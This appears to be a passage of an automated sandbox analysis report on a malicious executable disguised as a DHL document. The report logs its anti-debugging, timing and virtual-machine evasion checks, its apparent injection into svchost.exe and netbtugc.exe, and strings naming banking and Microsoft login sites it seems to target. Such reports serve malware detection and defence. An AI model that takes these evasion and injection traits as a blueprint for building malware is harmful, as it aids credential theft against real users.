            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: DHL 40312052024.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 40312052024.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 40312052024.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 40312052024.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 40312052024.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007B4B37 LoadLibraryA,GetProcAddress,0_2_007B4B37
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007BC4C7 push A3007BBAh; retn 007Bh 0_2_007BC50D
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007D8945 push ecx; ret 0_2_007D8958
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx 2_2_033309B6
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_0312EC6D pushfd ; retf 3_2_0312EC97
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_03128AC3 push 00000038h; iretd 3_2_03128AC7
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_0310F0B2 push esp; ret 3_2_0310F0B3
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_0312DE81 push FFFFFFBAh; ret 3_2_0312DE83
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_03124DE2 push ebx; iretd 3_2_03124E09
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_03124C3F push ebx; iretd 3_2_03124E09
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe - Code function: 3_2_0312349B pushad ; retf 3_2_0312349C
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007B48D7
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_00835376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00835376
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D3187
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\DHL 40312052024.exe - API/Special instruction interceptor: Address: 149D86C
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe - API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\netbtugc.exe - Window / User API: threadDelayed 3360
            Source: C:\Windows\SysWOW64\netbtugc.exe - Window / User API: threadDelayed 6613
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-103338
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe - API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 - Thread sleep count: 3360 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 - Thread sleep time: -6720000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 - Thread sleep count: 6613 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924 - Thread sleep time: -13226000s >= -30000s
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060 - Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060 - Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe TID: 7060 - Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe - Last function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0081445A
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081C6D1 FindFirstFileW,FindClose,0_2_0081C6D1
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0081C75C
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081EF95
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F0F2
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081F3F3
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_008137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008137EF
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_00813B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813B12
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0081BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081BCBC
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007B49A0
            Source: F56GKLK7U4.4.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.dr - Binary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.dr - Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.dr - Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4472859486.00000000009A9000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: F56GKLK7U4.4.dr - Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.dr - Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.dr - Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr - Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2499258829.000001C28C08C000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.dr - Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.dr - Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.dr - Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr - Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.dr - Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr - Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: DHL 40312052024.exe, 00000000.00000002.2053238601.0000000001317000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: vmwareworkstation.exeZu
            Source: F56GKLK7U4.4.dr - Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.dr - Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.dr - Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe - Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_00823F09 BlockInput,0_2_00823F09
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3B3A
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007E5A7C
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_007B4B37 LoadLibraryA,GetProcAddress,0_2_007B4B37
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0149C4A8 mov eax, dword ptr fs:[00000030h] 0_2_0149C4A8
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0149DB38 mov eax, dword ptr fs:[00000030h] 0_2_0149DB38
            Source: C:\Users\user\Desktop\DHL 40312052024.exe - Code function: 0_2_0149DAD8 mov eax, dword ptr fs:[00000030h] 0_2_0149DAD8
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h] 2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h] 2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h] 2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h] 2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h] 2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h] 2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h] 2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h] 2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h] 2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h] 2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h] 2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h] 2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h] 2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h] 2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h] 2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h] 2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h] 2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h] 2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h] 2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h] 2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h] 2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h] 2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h] 2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h] 2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h] 2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h] 2_2_0332826B
